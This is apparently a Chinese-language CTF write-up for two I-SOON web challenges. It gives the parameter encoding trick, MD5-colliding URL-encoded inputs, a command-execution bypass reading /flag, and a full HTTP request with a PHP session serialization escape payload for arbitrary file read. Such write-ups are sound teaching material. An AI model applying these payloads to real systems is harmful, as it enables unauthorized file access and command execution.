1. easy_web

首先通过img参数,读取index.php(编码规则为ascii转十六进制,再转两次base64)。
然后md5真值碰撞
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
然后绕命令执行,rev /flag

flag: I-SOON{e505e63c6df04fa9a2b49ef349f8234a}

2.easy_serialize_php

字符逃逸结合反序列化实现任意文件读取

需要注意的是flag文件要先读取phpinfo,找到flag字段,再依次往下读.

POST /index.php?f=show_image&img_path= HTTP/1.1
Host: 47.108.135.45:20004
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://47.108.135.45:20004/
Accept-Encoding: gzip, deflate
Accept-Language: en,zh;q=0.9,zh-CN;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 117

_SESSION[user]=phpphpphpphpphpphpphpphp&_SESSION[function]=1";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";s:1:"1";s:1:"1";}

Last modification:January 3rd, 2020 at 04:23 pm
给肥宅一点零花钱买可乐叭 (゜-゜)つロ